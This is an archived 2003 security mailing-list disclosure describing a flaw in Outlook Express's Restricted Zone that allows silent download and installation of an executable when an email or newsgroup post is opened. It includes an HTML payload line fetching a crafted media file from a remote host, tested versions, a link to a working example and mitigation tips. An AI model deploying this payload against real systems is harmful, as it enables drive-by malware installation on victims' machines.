Restricted Zone: the OUTLOOK EXPRESS

From: http-equivat_private
Date: Wed May 21 2003 - 04:55:34 PDT

    Tuesday, 20 May, 2003

    Silent delivery and installation of an executable on a target
    computer. No client input other than opening an email or newsgroup
    post.

    This can be achieved with the default setting of Outlook Express:
    RESTRICTED ZONE.

    Technically the following never worked, cannot work, shouldn't work.
    But it does:

    <head><style>
    <t:audio  t:src="http://www.malware.com/freek.asf"  />

    What that does is invoke our freakish media file including our trusty
    and battle-hardened 0s URL flip from within the html of an email or
    newsgroup post on viewing, which ordinarily could never be done.

    But it now appears that while custom-crafted media files fail,
    modified third-party files [whatever that means] function according
    to plan. Specifically audio + *.asf. Our 0s URL flip points to our
    file on the remote server and automatically forces our download as
    instructed. Couple that with the most recent flood-like functionality
    of the iframe: http://www.securityfocus.com/archive/1/321662 and
    that's the end of that.

    Tested on:

    Outlook Express 6.00.2800.1123 and all of its 'patches'
    with WMP 7.01.00.3055 and 8.00.00.4487 [WMP 9 fails]

    First Step Working Example:

    http://www.malware.com/but.its.free.zip

    Notes:

    1. this is reminiscent of GreyMagic Software's 'Qualcomm Eudora
    WebBrowser Control Embedded Media Player File Vulnerability ':
    http://www.securityfocus.com/bid/4343 which appears to never have
    been patched.

    2. disable scripting in the media player [if it helps]

    3. do not be lured into opening email and newsgroup posts from
    untrustworthy sources

    End Call

    --
    http://www.malware.com